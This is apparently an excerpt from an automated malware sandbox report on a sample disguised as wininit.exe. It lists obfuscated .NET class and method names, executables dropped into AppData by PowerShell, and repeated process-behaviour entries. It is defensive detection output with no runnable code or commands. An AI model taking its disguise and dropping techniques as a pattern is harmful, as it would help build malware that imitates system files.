            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\wininit.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
